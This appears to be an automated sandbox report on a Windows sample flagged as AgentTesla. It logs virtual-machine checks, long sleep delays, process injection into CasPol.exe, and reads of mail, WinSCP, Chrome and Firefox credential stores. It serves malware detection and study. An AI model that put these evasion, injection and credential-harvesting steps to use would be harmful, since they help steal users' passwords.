        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe TID: 6092Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2280Thread sleep count: 9641 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -21213755684765971s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1200000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1199750s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1199563s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1199390s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1199281s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1199155s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198980s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198859s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198750s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198637s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198515s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198404s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198293s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198186s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198078s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197963s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197843s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197734s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197625s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197516s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197405s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197280s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197162s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196891s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196779s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196638s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196531s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196422s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196309s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196203s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196093s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195984s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195875s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195765s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195656s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195547s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195432s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195312s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195203s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195078s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194953s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194843s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194734s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194625s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194499s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194391s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194279s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194172s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194062s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1193931s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1200000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199750Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199563Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199390Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199281Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199155Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198980Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198859Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198750Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198637Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198515Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198404Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198293Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198186Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198078Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197963Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197843Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197734Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197625Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197516Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197405Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197280Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197162Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196891Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196779Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196638Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196531Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196422Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196309Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196203Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196093Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195984Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195875Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195765Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195656Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195547Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195432Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195312Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195203Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195078Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194953Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194843Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194734Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194625Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194499Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194391Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194279Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194172Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194062Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1193931Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9641Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1200000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199750Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199563Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199390Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199281Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199155Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198980Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198859Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198750Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198637Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198515Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198404Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198293Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198186Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198078Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197963Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197843Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197734Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197625Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197516Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197405Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197280Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197162Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196891Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196779Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196638Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196531Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196422Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196309Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196203Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196093Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195984Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195875Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195765Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195656Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195547Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195432Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195312Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195203Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195078Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194953Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194843Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194734Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194625Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194499Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194391Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194279Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194172Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194062Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1193931Jump to behavior
        Source: CasPol.exe, 00000001.00000003.312026803.0000000005BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000Jump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42C000Jump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42E000Jump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 754008Jump to behavior
        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and writeJump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeQueries volume information: C:\Users\user\Desktop\e-dekont-20230207.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
